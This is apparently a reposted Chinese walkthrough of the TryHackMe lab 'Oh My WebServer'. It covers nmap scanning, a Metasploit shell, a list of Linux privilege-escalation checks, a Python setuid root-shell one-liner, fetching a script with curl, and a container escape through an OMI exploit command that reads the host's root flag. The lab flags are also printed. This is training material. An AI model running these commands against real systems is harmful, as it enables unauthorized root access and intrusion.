当前位置: 首页 > backend >正文

[TryHackMe]Oh My WebServer(nday漏洞+容器逃逸)

backend 2025/9/6 3:51:31

1.信息收集

nmap扫描

查找相应exploit

2.GetShell

使用msfconsole

设置好参数后getshell

home中没有任何东西

在根目录下有个.dockerenv文件

我们可以判断我们的shell在docker容器中

3.容器提权

Linux提权基本手段:

1.SUID提权  find / -type f -perm -040000 -l 2>/dev/null

2.sudo部分权限 提权  sudo -l

3.修改二进制文件提权 getcap -r / 2>/dev/null

4.查看任务表定时启动文件提权  cat /etc/crontab

5.PATH权限提权  echo $PATH

6.NFS网络文件共享提权 cat /etc/exports

查看二进制文件发现py3.7

/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'

THM{eacffefe1d2aafcc15e70dc2f07f7ac1}

4.容器逃逸 从root(Docker)到root(主机)

我找找到了

172.17.0.2

编写一个脚本

上传脚本

curl http://IP/1.py

查看开放端口

port 22 is open
port 80 is open
port 5986 is open

5986端口正在托管 OMI 服务

python3 omi.py -t 172.17.0.1 -c 'cat /root/root.txt'

THM{7f147ef1f36da9ae29529890a1b6011f}

http://www.xdnf.cn/news/19855.html

相关文章:

  • Teacher Forcing技术解析
  • 解构复杂财务逆向业务:如何优雅地生成与管理负数单?
  • c++ zint二维码、条形码开发库
  • k8s初始化常见问题
  • 笔记:深层卷积神经网络(CNN)中的有效感受野简单推导
  • 行业分享丨基于SimSolid的大型汽车连续冲压模具刚度分析
  • vue3前端开发的基础教程——快速上手
  • flutter 中间组件自适应宽度
  • 硬件:51单片机的按键、中断、定时器、PWM及蜂鸣器
  • 深入解析MongoDB内部架构设计
  • 深度学习-----简单入门卷积神经网络CNN的全流程
  • 做 DevOps 还在被动救火?这篇让你把监控玩成 “运维加速器”!
  • 【CV】OpenCV基本操作④——算术操作
  • OpenGL视图变换矩阵详解:从理论推导到实战应用
  • 《四川棒球知识百科》球速最快的运动之一·棒球1号位
  • Grok-4 :AI 基准测试霸主,速度与智能并存——但代价几何?
  • 学习 Android (十九) 学习 OpenCV (四)
  • sql项目总结
  • 无人机报警器8G信号技术解析
  • npm install 报错问题解决 npm install --ignore-scripts
  • 嵌入式学习---(单片机)
  • 【Kubernetes知识点】监控升级,备份及Kustomize管理
  • Python 基础语法与控制流程学习笔记
  • 学习笔记:MYSQL(3)(常用函数和约束)
  • 嵌入式人别再瞎折腾了!这8个开源项目,解决按键/队列/物联网所有痛点,小白也能抄作业
  • 【JVS更新日志】低代码、物联网、无忧企业计划9.3更新说明!
  • GitLab Boards 深度解析:选型、竞品、成本与资源消耗
  • 上下文记忆力媲美Genie3,且问世更早:港大和可灵提出场景一致的交互式视频世界模型!
  • MindNode AI:AI辅助思维导图工具,高效整理思路快速搭框架
  • React学习教程,从入门到精通, React 组件语法知识点(9)